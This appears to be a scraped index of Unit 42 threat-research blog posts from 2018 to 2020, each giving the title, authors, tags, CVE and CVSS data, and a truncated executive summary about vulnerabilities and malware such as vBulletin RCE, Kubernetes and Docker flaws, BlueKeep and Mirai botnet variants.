## Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
blogs_unit42·2020-09-03·CVSS 9.8
Haozhe Zhang
Qi Deng
Zhibin Zhang
Ruchna Nigam
Published: September 3, 2020
Threat Research
Vulnerabilities
CVE-2019-16759
CVE-2020-17496
Exploits
## Executive Summary
In September 2019, a remote code execution (RCE) vulnerability identified as CVE-2019-16759 was disclosed for vBulletin, a popular forum software. At that time, Unit 42 researchers published a blog on this vBulletin vulnerability, analyzing its root cause and the exploit we found in the wild. By exploiting this vulnerability, an attacker could have gained privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organi
## The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
blogs_unit42·2020-08-26
Jay Chen
Published: August 26, 2020
Threat Research
Vulnerabilities
Exploit
## Executive Summary
With the ever-increasing number of new vulnerabilities, vulnerability management becomes one of the most critical processes in ensuring continuous business operation. While it is clear that timely patching is essential, it’s also important to know quantitatively how a delay could increase risk. What is the chance that attackers breach my organization using a CVE just disclosed or using an unknown (zero-day) vulnerability? To understand the state of vulnerability disclosure and exploit development, Unit 42 researchers analyzed 45,450 publicly availabl
## Kubernetes Vulnerability Puts Clusters at Risk of Takeover (CVE-2020-8558)
blogs_unit42·2020-07-27·CVSS 5.4
Yuval Avrahami
Ariel Zelivansky
Published: July 27, 2020
Threat Research
Vulnerabilities
CVE-2020-8558
Kubernetes
## Executive Summary
A security issue assigned CVE-2020-8558 was recently discovered in the kube-proxy, a networking component running on Kubernetes nodes. The issue exposed internal services of Kubernetes nodes, often run without authentication. On certain Kubernetes deployments, this could have exposed the api-server, allowing an unauthenticated attacker to gain complete control over the cluster. An attacker with this sort of access could steal information, deploy crypto miners or remove existing services altogether.
The vulnera
## Threat Brief: Microsoft DNS Server Wormable Vulnerability CVE-2020-1350
blogs_unit42·2020-07-21·CVSS 10.0
Mike Harbison
Brandon Young
Published: July 21, 2020
High Profile Threats
Vulnerabilities
APAC
Defense
Education
EMEA
Finance
Government
Health Care
High Tech
Retail
## Executive Summary
In July 2020, Microsoft released a security update, CVE-2020-1350 | Windows DNS Server Remote Code Execution Vulnerability, for a new remote code execution (RCE) vulnerability.
This vulnerability exists within the Microsoft Windows Domain Name System (DNS) Server due to the improper handling of certain types of requests, specifically over port 53/TCP. Exploitation of this vulnerability is possible by creating an integer overflow, potentially leading
## Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
blogs_unit42·2020-06-24·CVSS 9.8
Ken Hsu
Durgesh Sangvikar
Zhibin Zhang
Chris Navarrete
Published: June 24, 2020
Threat Research
Vulnerabilities
Cryptocurrency mining
Cryptojacking
DDoS
Lucifer
## Executive Summary
On May 29, 2020, Unit 42 researchers discovered a new variant of a hybrid cryptojacking malware from numerous incidents of CVE-2019-9081 exploitation in the wild. A closer look revealed the malware, which we’ve dubbed “Lucifer”, is capable of conducting DDoS attacks and well-equipped with all kinds of exploits against vulnerable Windows hosts. The first wave of the campaign stopped on June 10, 2020. The attacker th
## AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations
blogs_unit42·2020-06-17·CVSS 8.8
Dominik Reichel
Esmid Idrizovic
Published: June 17, 2020
Malware
Threat Research
Vulnerabilities
AcidBox
CVE-2008-3431
Pensive Ursa
Turla
## Executive Summary
When the news broke in 2014 about a new sophisticated threat actor dubbed the Turla Group, which the Estonian foreign intelligence service believes has Russian origins and operates on behalf of the FSB, its kernel-mode malware also became the first publicly described case that abused a third-party device driver to disable Driver Signature Enforcement (DSE). This security mechanism was introduced in Windows Vista to prevent unsigned drivers from loading into kernel space. Turla explo
Unit42
blogs_unit42·2020-06-12·CVSS 8.8
## 6 New Vulnerabilities Found on D-Link Home Routers
Gregory Basior
Published: June 12, 2020
Threat Research
Vulnerabilities
D-Link
IoT
Wireless routers
## Executive Summary
On February 28, 2020, Palo Alto Networks’ Unit 42 researchers discovered six new vulnerabilities in D-Link wireless cloud routers running their latest firmware.
The vulnerabilities were found in the DIR-865L model of D-Link routers, which is meant for home network use. The current trend towards working from home increases the likelihood of malicious attacks against home networks, which makes it even more imperative to keep our networking devices updated.
It is possible that some of these vulnerabilities are also present in newer models of the
Unit42
blogs_unit42·2020-04-03·CVSS 9.8
## Grandstream and DrayTek Devices Exploited to Power New Hoaxcalls DDoS Botnet
Ken Hsu
Haozhe Zhang
Zhibin Zhang
Ruchna Nigam
Published: April 3, 2020
Threat Research
Vulnerabilities
CVE-2020-5722
CVE-2020-8515
DDoS
Gafgyt
## Executive Summary
As soon as the proof-of-concept (PoC) for CVE-2020-8515 was made publicly available in March, this vulnerability was employed by a new DDoS botnet for propagation. Further analysis shows that this malware can also propagate by exploiting CVE-2020-5722. As of now, the attack traffic detected has doubled since 03/31/2020, implying that many Grandstream UCM6200 and Draytek Vigor devices are infected or under active attack. We notified regional CERTs of potentially infected devi
Unit42
blogs_unit42·2020-03-19·CVSS 9.8
## New Mirai Variant Targets Zyxel Network-Attached Storage Devices
Ken Hsu
Zhibin Zhang
Ruchna Nigam
Published: March 19, 2020
Malware
Threat Research
Vulnerabilities
CVE-2020-9054
Mirai variant
## Executive Summary
As soon as the proof-of-concept (PoC) for CVE-2020-9054 was made publicly available last month, this vulnerability was promptly abused to infect vulnerable versions of Zyxel network-attached storage (NAS) devices with a new Mirai variant - Mukashi.
Mukashi brute forces the logins using different combinations of default credentials, while informing its command and control (C2) server of the successful login attempts. Multiple, if not all, Zyxel NAS products running firmware versions up to 5.21 are vulnerable to t
Unit42
blogs_unit42·2020-03-11·CVSS 10.0
## Threat Brief: Microsoft SMBv3 Wormable Vulnerability CVE-2020-0796
Mike Harbison
Brandon Young
Published: March 11, 2020
High Profile Threats
Vulnerabilities
CVE-2020-0796
Remote Code Execution
## Executive Summary
In March 2020, Microsoft released a security advisory, ADV200005 | Microsoft Guidance for Disabling SMBv3 Compression, for a new remote code execution (RCE) vulnerability. Shortly after this advisory was released, Microsoft issued an out-of-band patch to protect affected users from CVE-2020-0796. An out-of-band patch is one released outside of a vendor's expected update period. In this particular case, Microsoft is known to release updates on Patch Tuesday, which was two days prior to th
Unit42
blogs_unit42·2020-03-10
## 2020 Unit 42 IoT Threat Report
Unit 42
Published: March 10, 2020
Trend Reports
Vulnerabilities
IoT
Threat research
## Introduction
To understand the full scope of the current IoT threat landscape, we analyzed 1.2 million IoT devices in thousands of physical locations across enterprise IT and healthcare organizations in the United States in 2018 and 2019. Using Palo Alto Networks’ IoT security product, Zingbox, we created the 2020 Unit 42 IoT Threat Report to identify the top IoT threats and provide recommendations that organizations can take to immediately reduce IoT risk in their environments.
Most notably, the report reveals that 83% of medical imaging devices are running on unsupported operating systems. This re
Unit42
blogs_unit42·2020-02-03·CVSS 9.8
## Actors Still Exploiting SharePoint Vulnerability to Attack Middle East Government Organizations
Robert Falcone
Published: February 3, 2020
Threat Research
Vulnerabilities
China Chopper
CVE-2019-0604
Emissary Panda
Middle East
SharePoint
## Executive Summary
On September 10, 2019, we observed unknown threat actors exploiting a vulnerability in SharePoint described in CVE-2019-0604 to install several webshells on the website of a Middle East government organization. One of these webshells is the open source AntSword webshell freely available on GitHub, which is remarkably similar to the infamous China Chopper webshell.
On January 10, 2020, we used Shodan to search for Internet accessible servers running versions of
Unit42
blogs_unit42·2020-01-17·CVSS 8.1
## Threat Brief: Windows CryptoAPI Spoofing Vulnerability CVE-2020-0601
Brandon Young
Mike Harbison
Published: January 17, 2020
High Profile Threats
Vulnerabilities
Curveball
CVE-2020-0601
Microsoft Vulnerability
## Executive Summary
In January 2020, during the first Patch Tuesday of the new year, Microsoft released patches for 17 new vulnerabilities including one for CVE-2020-0601 known as Curveball. The vulnerability exists in the Windows CryptoAPI (Crypt32.dll) and specifically relates to the method used for Elliptic Curve Cryptography (ECC) certificate validation. At the time of release, Microsoft affirmed that they had not yet seen the vulnerability exploited in the wild (ITW). Researcher Tal Be’ery released
Unit42
blogs_unit42·2020-01-16·CVSS 9.8
## Exploits in the Wild for Citrix ADC and Citrix Gateway Directory Traversal Vulnerability CVE-2019-19781
Yue Guan
Qi Deng
Zhibin Zhang
Siddhart Shibiraj
Zhanhao Chen
Cecilia Hu
John Harrison
Published: January 16, 2020
Threat Research
Vulnerabilities
Citrix
CVE-2019-19781
Proof of Concept
Remote Code Execution
## Executive Summary
Just before the holidays, a vulnerability was identified in Citrix Application Delivery Controller (ADC) and Citrix Gateway which allowed remote attackers to easily send directory traversal requests, read sensitive information from system configuration files without the need for user authentication and remotely execute arbitrary code. This vulnerability affects all supported product v
Unit42
blogs_unit42·2019-12-19·CVSS 7.5
## Unit 42 Discovers 13 New Vulnerabilities Across Microsoft and Adobe Products
John Harrison
Published: December 19, 2019
Threat Research
Vulnerabilities
Adobe
Microsoft
Zero-day
## Overview
Palo Alto Networks’ Unit 42 threat researchers have been credited with discovering six new vulnerabilities addressed by the Adobe Product Security Incident Response Team (PSIRT) as part of its December Adobe Security Bulletin APSB19-55 security updates. Additionally, seven new “important” rated vulnerabilities were addressed by the Microsoft Security Response Center (MSRC) as part of its September, October and November 2019 security update releases.
## Vulnerabilities
The Adobe vulnerabilities discovered included two “critical”
Unit42
blogs_unit42·2019-12-13
## Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Ruchna Nigam
Published: December 13, 2019
Malware
Threat Research
Vulnerabilities
Echobot
IoT
IoT Vulnerability
Mirai
Mirai variant
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploite
Unit42
blogs_unit42·2019-12-12·CVSS 9.8
## Unit 42 Presents New Research at BlueHat Seattle on Three New Windows RDP Vulnerability Exploit Methods
John Harrison
Published: December 12, 2019
Threat Research
Vulnerabilities
BlueHat
BlueHat Seattle
Pool Fengshui
Vulnerability Exploitation
Windows RDP
## Overview
The Unit 42 threat intelligence team recently shared its latest findings at Microsoft’s invitation-only security conference, BlueHat Seattle 2019, on three new Windows Remote Desktop Protocol (RDP) vulnerability exploitation methods for Pool Feng Shui techniques. Pool Feng Shui is an advanced vulnerability exploitation technique that finely manipulates the kernel pool layout and state to facilitate arbitrary code execution.
The report, titled “Pool Fe
Unit42
blogs_unit42·2019-12-12
## What I Learned from Reverse Engineering Windows Containers
Daniel Prizmant
Published: December 12, 2019
Cloud Cybersecurity Research
Learning Hub
Vulnerabilities
Container security
Container vulnerability
Containers
Docker
Job Objects
JobObject
Kernel
Microsoft
Object Silo
Reverse Engineering
Reversing
ServerSilo
Windows
## Executive Summary
In recent years, containers have become increasingly popular. A few years ago, Microsoft recognized this and teamed up with Docker to offer a container solution for Microsoft Windows.
Judging by the number of severe vulnerabilities found in containers for Linux in recent years, it is likely that some vulnerabilities exist in containers for Windows as well. Windo
Unit42
blogs_unit42·2019-11-26·CVSS 6.5
## Server-Side Request Forgery Exposes Data of Technology, Industrial and Media Organizations
Jay Chen
Published: November 26, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Container
Jira
Kubernetes
Metadata API
Misconfiguration
Public cloud
Server-Side Request Forgery
SSRF
## Executive Summary
Server-Side Request Forgery (SSRF) is a web application vulnerability that redirects the attacker's requests to the internal network or localhost behind the firewall. SSRF poses a particular threat to cloud services due to the use of the metadata API that allows applications to access the underlying cloud infrastructure's information such as configurations, logs, and credentials. Although th
Unit42
blogs_unit42·2019-11-19·CVSS 9.8
## Docker Patched the Most Severe Copy Vulnerability to Date With CVE-2019-14271
Yuval Avrahami
Published: November 19, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Container breakout
Container escape
Containers
CVE-2019-14271
Docker
Exploit
## Executive Summary
In the last few years, several vulnerabilities in the copy (cp) command were found in various container platforms, including Docker, Podman and Kubernetes. The most severe among those was only recently discovered and disclosed in July. Surprisingly, it gained almost no immediate attention, perhaps due to an ambiguous CVE description and a lack of a published exploit.
CVE-2019-14271 marks a security issue in the implementa
Unit42
blogs_unit42·2019-11-01
## Web-Based Threats: First Half 2019
Fang Liu
Tao Yan
Jin Chen
Rongbo Shao
Zhanglin He
Bo Qu
Published: November 1, 2019
Malware
Trend Reports
Vulnerabilities
ELink
Exploit Kits
Malicious Domains
Malicious URL
Phishing
## Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system. In examining the data we collect, which includes URLs extracted from emails or submitted by API, we can identify patterns and trends which help us discern prevalent web threats. This blog is the fifth installment in a series of posts tracking web-based threats over time, specifically, statistics pertaining to malicious URLs, domains, exploit kits, vulnerabilities, and phishing scams.
Unit42
blogs_unit42·2019-10-31·CVSS 9.8
## Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
Asher Davila
Published: October 31, 2019
Cybercrime
Threat Research
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
WiFi routers
## Executive Summary
In September 2019, during the proactive IoT threat-hunting process conducted daily by the Unit 42 (formerly Zingbox security research) team, we discovered an updated Gafgyt variant attempting to infect IoT devices; specifically small office/home wireless routers of known commercial brands like Zyxel, Huawei, and Realtek. This Gafgyt variant is a competing botnet to the JenX botnet, which also uses remote code execution exploits to gain access and recruit routers into botnets to attack gaming servers - mos
Unit42
blogs_unit42·2019-10-09·CVSS 9.8
## Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2019-16759
Qi Deng
Zhibin Zhang
Hui Gao
Published: October 9, 2019
Cybercrime
Threat Research
Vulnerabilities
CVE-2019-16759
Pre-auth remote code
VBulletin
## Executive Summary
A new zero-day vulnerability was recently disclosed for vBulletin, a proprietary Internet forum software package, and the assigned CVE number is CVE-2019-16759. Now, several weeks later, Unit 42 researchers have identified active exploitation of this vulnerability in the wild. By exploiting this vulnerability, an unauthenticated attacker can gain privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organizations out from thei
Unit42
blogs_unit42·2019-09-18·CVSS 6.5
## Critical Vulnerability in Harbor Enables Privilege Escalation from Zero to Admin (CVE-2019-16097)
Aviv Sasson
Published: September 18, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
CNCF
Containers
CVE-2019-16097
Harbor
## Executive Summary
Aviv Sasson, a security researcher from the cloud division of Unit 42, has identified a critical vulnerability in a widespread cloud native registry called Harbor. The vulnerability allows attackers to take over Harbor registries by sending them a malicious request.
The maintainers of Harbor released a patch that closes this critical security hole. Versions 1.7.6 and 1.8.3 include this fix.
Unit 42 has found 1,300 Harbor registries open to the i
Unit42
blogs_unit42·2019-09-17
## The Legend of Adwind: A Commodity RAT Saga in Eight Parts
Unit 42
Published: September 17, 2019
Malware
Threat Research
Vulnerabilities
Adwind
Alien Spy
Commodity RAT
Frutas
JBifrost
JConnectPro
JSocket
UnknownRat
UnReCoM
## Executive Summary
In early 2012, a developer started selling the first of the Adwind family, Java-based remote access tools (RATs), called “Frutas.” In the ensuing years, it has been rebranded at least seven times. Its other names have included Adwind, UnReCoM, Alien Spy, JSocket, JBifrost, UnknownRat, and JConnectPro.
The Adwind RAT family remains prevalent in the wild. Palo Alto Networks has collected over 45,000 samples from the various Adwind iterations. We have observed these samples used in
Unit42
blogs_unit42·2019-09-04·CVSS 7.8
## Unit 42 Named Top Zero-Day Vulnerability Contributor by Microsoft
John Harrison
Published: September 4, 2019
Threat Research
Vulnerabilities
Microsoft Security Response Center
MSRC
Threat research
This piece was originally published August 16 on the Palo Alto Networks blog.
Palo Alto Networks is proud that Microsoft has recognized our Unit 42 global threat intelligence team with multiple awards for its contributions to vulnerability research, including first place for discovery of Zero Day vulnerabilities. Microsoft also recognized Unit 42 researchers Gal De Leon and Bar Lahav in its annual list of the Most Valuable Security Researchers.
Unit 42, which also won third place for “Vulnerability Top Contributor,” was t
Unit42
blogs_unit42·2019-08-29·CVSS 9.8
## Exploitation of Windows CVE-2019-0708 (BlueKeep): Three Ways to Write Data into Kernel with RDP PDU
Tao Yan
Jin Chen
Published: August 29, 2019
Threat Research
Vulnerabilities
Bluekeep
CVE-2019-0708
RDP
## Executive Summary
In May 2019, Microsoft released an out-of-band patch update for the remote code execution vulnerability CVE-2019-0708, also known as “BlueKeep”, which resides in the code of Remote Desktop Services (RDS). This vulnerability is pre-authentication and requires no user interaction, which makes it particularly dangerous, as it has the unsettling potential to be weaponized into a destructive exploit. If successfully exploited, this vulnerability could execute arbitrary code with “system” privileges. The Micr
Unit42
blogs_unit42·2019-08-28·CVSS 4.9
## Non-Root Containers, Kubernetes CVE-2019-11245 and Why You Should Care
Ariel Zelivansky
Published: August 28, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Containers
CVE-2019-11245
Kubernetes
On May 31st, the Kubernetes Product Security Committee announced a security regression in Kubernetes, for which they assigned CVE-2019-11245. The problem caused containers that use images which are supposed to run as a non-root user to run as root the second time they are used or upon restart of the container.
Before elaborating on this particular security issue, let’s first clarify why running a program as root in a container is even a concern at all.
## Non-root containers
When run
Unit42
blogs_unit42·2019-07-12
## USBCreator D-Bus Privilege Escalation in Ubuntu Desktop
Nadav Markus
Published: July 12, 2019
Threat Research
Vulnerabilities
Linux
Privilege escalation
Ubuntu
## Executive Summary
A vulnerability in the USBCreator D-Bus interface allows an attacker with access to a user in the sudoer group to bypass the password security policy imposed by the sudo program. The vulnerability allows an attacker to overwrite arbitrary files with arbitrary content, as root - without supplying a password. This trivially leads to elevated privileges, for instance, by overwriting the shadow file and setting a password for root. The issue was resolved in June when Ubuntu patched the relevant packages in response to a vulnerability disclosur
Unit42
blogs_unit42·2019-07-02·CVSS 7.8
## Tale of a Windows Error Reporting Zero-Day (CVE-2019-0863)
Gal De Leon
Published: July 2, 2019
Threat Research
Vulnerabilities
CVE-2019-0863
Windows
In December 2018, a hacker who goes by the alias ‘SandboxEscaper’ publicly disclosed a zero-day vulnerability in the Windows Error Reporting (WER) component. Digging deeper into her submission, I discovered another zero-day vulnerability, which could be abused to elevate system privileges. According to the Microsoft advisory, attackers exploited this bug as a zero-day in the wild until the patch was released in May 2019.
So how did this bug work exactly?
## Microsoft WER Under the Hood
The Windows Error Reporting tool is a flexible event-based feedback infrastructure de
Unit42
blogs_unit42·2019-06-21·CVSS 7.5
## TCP SACK Panics Linux Servers
Unit 42
Published: June 21, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
AWS
Azure
CVE-2019-11477
CVE-2019-11478
CVE-2019-11479
GCP
Linux
Public cloud
SACK
## Executive Summary
The newly discovered Linux vulnerabilities, CVE-2019-11477, CVE-2019-11478, and CVE-2019-11479, affect all Linux operating systems running kernel 2.6.29 (released in March 2009) or newer and can cause a kernel panic on systems with services listening on a TCP connection. This remote attack can put a server into a Denial of Service (DoS) state, but remote code execution is not a concern. The vulnerability is rooted in flaws in the TCP Selective Acknowledgement (SACK)
Unit42
blogs_unit42·2019-06-20·CVSS 7.5
## Unit 42 Discovers 10 New Microsoft Vulnerabilities
John Harrison
Published: June 20, 2019
Threat Research
Vulnerabilities
Microsoft
Palo Alto Networks Unit 42 threat researchers have discovered one new vulnerability addressed by the Microsoft Security Response Center (MSRC) as part of their June 2019 security update release, as well as nine additional vulnerabilities that were addressed in May 2019. The vulnerabilities discovered were all rated “Important” in severity.
Palo Alto Networks customers who deploy our Next-Generation Security Platform according to best practices and have a Threat Prevention Subscription are protected from zero-day vulnerabilities such as these. Weaponized exploits for these vulnerabilities
Unit42
blogs_unit42·2019-06-12·CVSS 9.8
## Hide ‘N Seek Botnet Updates Arsenal with Exploits Against Nexus Repository Manager & ThinkPHP
Ruchna Nigam
Published: June 12, 2019
Threat Research
Vulnerabilities
CVE-2018-20062
CVE-2019-7238
Exploits
HideNSeek
IoT
Linux
ThinkPHP
## Executive Summary
The Hide 'N Seek botnet was first discovered in January 2018 and is known for its unique use of Peer-to-Peer communication between bots.
Since its discovery, the malware family has seen a couple of upgrades, from the addition of persistence and new exploits, to targeting Android devices via the Android Debug Bridge (ADB).
This post details a variant of the family first seen on the 21st of February 2019, incorporating two new exploits - CVE-2018-20062 which targets Thin
Unit42
blogs_unit42·2019-06-07·CVSS 9.8
## New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
Ruchna Nigam
Published: June 6, 2019
Malware
Threat Research
Vulnerabilities
CVE-2017-5174
CVE-2018-11510
CVE-2018-17173
CVE-2018-6961
CVE-2019-2725
CVE-2019-3929
Exploits
IoT
Linux
Mirai
## Executive Summary
Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016 when it took down several notable targets.
As part of this ongoing research, we’ve recently discovered a new variant of Mirai that has eight new exploits against a wide range of embedded devices. These newly targeted devices range from wireless prese
Unit42
blogs_unit42·2019-05-30·CVSS 8.8
## Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Published: May 30, 2019
Malware
Trend Reports
Vulnerabilities
Azorult
CVE-2018-8174
ELink
## Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system. In examining the data it collects, which are URLs extracted from emails or submitted by API, we can identify patterns and trends which help us discern prevalent web threats. This blog is the fourth (4th quarter of 2018) installment in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, CVEs, and now, ph
Unit42
blogs_unit42·2019-05-30·CVSS 7.7
## Breaking Out of rkt – 3 New Unpatched CVEs
Yuval Avrahami
Published: May 30, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
CVE-2019-10147
Docker
CVE-2019-10144
CVE-2019-10145
## Executive Summary
Back in February, I wrote a piece on the major runC vulnerability, CVE-2019-5736. The fundamental flaw behind this vulnerability affected most container runtimes, such as LXC and Apache Mesos. One container runtime which seemed to be unfazed was CoreOS rkt, which I had heard a lot about back when I first started to get into containers. So naturally, I was intrigued to check out rkt’s architecture and see what they did differently, and I recently had some time to do so.
I ended up finding 3 other
Unit42
blogs_unit42·2019-05-03·CVSS 9.8
## Attackers Increasingly Targeting Oracle WebLogic Server Vulnerability for XMRig and Ransomware
Ken Hsu
Matthew Tennis
Yanhui Jia
Zhibin Zhang
Durgesh Sangvikar
Published: May 3, 2019
Malware
Threat Research
Vulnerabilities
CVE-2019-2725
Exploits
GandCrab
Oracle WebLogic
Sodinokibi
XMRig
## Executive Summary
Unit 42 researchers at Palo Alto Networks have uncovered exploitation activity against an Oracle WebLogic zero-day critical deserialization vulnerability (CVE-2019-2725) that occurred before the release of the out-of-band patch by Oracle on April 26, 2019. Oracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Once the vulnerability was made publ
Unit42
blogs_unit42·2019-04-30·CVSS 7.5
## Muhstik Botnet Exploits the Latest WebLogic Vulnerability for Cryptomining and DDoS Attacks
Cong Zheng
Yanhui Jia
Published: April 30, 2019
Malware
Threat Research
Vulnerabilities
Botnet
Exploit
Linux Malware
Muhstik
WebLogic
## Executive Summary
On April 28th, 2019, Unit 42 discovered a new variant of the Linux botnet Muhstik. This new version exploits the latest WebLogic server vulnerability (CVE-2019-2725), disclosed just five days ago, to install itself on vulnerable systems. Oracle released an emergency patch for the vulnerability on April 26, 2019. We have confirmed that the patch successfully protects against this latest version of Muhstik.
From the timeline, we can see that the developer of Muhstik watches
Unit42
blogs_unit42·2019-04-22·CVSS 6.1
## Exploits in the Wild for WordPress Social Warfare Plugin CVE-2019-9978
Qi Deng
Zhibin Zhang
Hui Gao
Published: April 22, 2019
Threat Research
Vulnerabilities
CVE-2019-9978
Social Warfare Plugin
WordPress
On 21 March, researchers disclosed two vulnerabilities in Social Warfare, a very popular WordPress plugin which adds social share buttons to a website or blog. One vulnerability is a stored cross-site scripting (XSS) vulnerability and the other is a remote code execution (RCE) vulnerability; both are tracked by CVE-2019-9978. Both vulnerabilities are present in versions 3.5.0-3.5.2 of Social Warfare; a fix was released on 21 March in version 3.5.3. Approximately 60,000 active installations were foun
Unit42
Disclosing a directory traversal vulnerability in Kubernetes copy – CVE-2019-1002101
blogs_unit42·2019-03-28·CVSS 4.2
CVE-2019-1002101 [MEDIUM] Disclosing a directory traversal vulnerability in Kubernetes copy – CVE-2019-1002101
## Disclosing a directory traversal vulnerability in Kubernetes copy – CVE-2019-1002101
Ariel Zelivansky
Published: March 28, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
CVE-2019-1002101
Kubernetes
## Executive Overview
On March 4, I reported a security vulnerability in kubectl to the Kubernetes and OpenShift security teams, which was assigned CVE-2019-1002101. This post explains the discovery process, the vulnerability details and its impact and exploitation methods. Thanks to Brandon Phillips of Red Hat for coordinating the disclosure process. The announcement made today by the Kubernetes team can be found here.
## Vulnerability discovery
I was exploring Kubernetes commands when a
Unit42
Unit 42 Vulnerability Research Team Discovers 23 New Vulnerabilities February 2019 Disclosures – Adobe and Microsoft
blogs_unit42·2019-02-22·CVSS 7.8
[HIGH] Unit 42 Vulnerability Research Team Discovers 23 New Vulnerabilities February 2019 Disclosures – Adobe and Microsoft
## Unit 42 Vulnerability Research Team Discovers 23 New Vulnerabilities February 2019 Disclosures – Adobe and Microsoft
John Harrison
Published: February 22, 2019
Threat Research
Vulnerabilities
Adobe
Microsoft
Zero-day
As part of Unit 42’s ongoing threat research, we can now disclose that Palo Alto Networks Unit 42 threat researchers have discovered 23 new vulnerabilities addressed by the Adobe Product Security Incident Response Team (PSIRT) as part of their February 2019 APSB19-07 security update release and 2 vulnerabilities addressed by the Microsoft Security Response Center (MSRC) as part of their February 2019 security update release. Severity ratings ranged from Important to Critical for each of these vulnerabilitie
Unit42
Breaking out of Docker via runC – Explaining CVE-2019-5736
blogs_unit42·2019-02-21·CVSS 8.6
CVE-2019-5736 [HIGH] Breaking out of Docker via runC – Explaining CVE-2019-5736
## Breaking out of Docker via runC – Explaining CVE-2019-5736
Yuval Avrahami
Published: February 21, 2019
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
Container breakout
Container escape
Containers
CVE-2019-5736
Docker
Exploit
RunC
Last week (2019-02-11) a new vulnerability in runC was reported by its maintainers, originally found by Adam Iwaniuk and Borys Poplawski. Dubbed CVE-2019-5736, it affects Docker containers running in default settings and can be used by an attacker to gain root-level access on the host.
Aleksa Sarai, one of runC’s maintainers, found that the same fundamental flaw exists in LXC. As opposed to Docker though, only privileged LXC containers are vulnerable. Both runC
Unit42
Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
blogs_unit42·2018-12-27·CVSS 9.8
CVE-2015-5119 [CRITICAL] Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
## Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Xingyu Jin
Published: December 27, 2018
Malware
Trend Reports
Vulnerabilities
CVE-2015-5119
ELink
## Executive Summary
Our Email Link Analysis (ELINK) system is routinely reviewed by our Unit 42 research team. In examining the data it collects, we discover patterns and trends which help us discern prevalent web threats. This blog is the third (3rd quarter of 2018) in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, and CVEs.
During Quarter 3 (Q3), July – September, a notable shift occurred with the malicious URL and domain d
Unit42
Threat Brief: Twelve Tips for the Holidays
blogs_unit42·2018-12-13
Threat Brief: Twelve Tips for the Holidays
## Threat Brief: Twelve Tips for the Holidays
Unit 42
Published: December 13, 2018
High Profile Threats
Learning Hub
Devices
Holidays
Home security
IoT
Privacy
This time every year, people all over the world get new devices. Regardless of what holiday(s) you may (or may not) celebrate, the end of the year is a time for people to give and receive some of the latest devices to come on to the market.
Nothing spoils a new gadget more than having some kind of security or privacy problem related to it. After that, nothing spoils the fun and excitement of unboxing and playing with an exciting new device more than trying to figure out what you need to do to use it with reasonable safety and privacy.
To that end, we’re providing some very basic, but critical steps that you, your family, you
Unit42
Demystifying Kubernetes CVE-2018-1002105 (and a dead simple exploit)
blogs_unit42·2018-12-09·CVSS 9.8
CVE-2018-1002105 [CRITICAL] Demystifying Kubernetes CVE-2018-1002105 (and a dead simple exploit)
## Demystifying Kubernetes CVE-2018-1002105 (and a dead simple exploit)
Ariel Zelivansky
Published: December 9, 2018
Cloud Cybersecurity Research
Threat Research
Vulnerabilities
CVE-2018-1002105
Kubernetes
Earlier this week a major vulnerability in Kubernetes was made public by its maintainers. It was originally caught as a bug by Darren Shepherd and was later marked as a critical vulnerability and assigned CVE-2018-1002105. Its implications were clearly laid out on its GitHub issue page by Kubernetes developer Jordan Liggitt. The bug was fixed and new versions were tagged for all supported Kubernetes releases.
Many technology news sites published articles with warnings, and cloud providers followed with their own updates and mitigations (Google, Azure, AWS). At Twistlock, ou
Unit42
Inception Attackers Target Europe with Year-old Office Vulnerability
blogs_unit42·2018-11-05·CVSS 8.8
CVE-2012-1856 [HIGH] Inception Attackers Target Europe with Year-old Office Vulnerability
## Inception Attackers Target Europe with Year-old Office Vulnerability
Tom Lancaster
Published: November 5, 2018
Malware
Threat Research
Vulnerabilities
CVE-2012-1856
CVE-2017-11882
EMEA
Espionage
Government
Inception
PowerShell
PowerShower
Remote Templates
The Inception attackers have been active since at least 2014 and have been documented previously by both Blue Coat and Symantec; historical attacks used custom malware for a variety of platforms and targeted a range of industries, primarily in Russia, but also around the world. This blog describes attacks against European targets observed in October 2018, using CVE-2017-11882 and a new PowerShell backdoor we’re calling POWERSHOWER due to the attention to deta
Unit42
Threat Brief: Embrace Mobile Banking with Caution
blogs_unit42·2018-10-23
Threat Brief: Embrace Mobile Banking with Caution
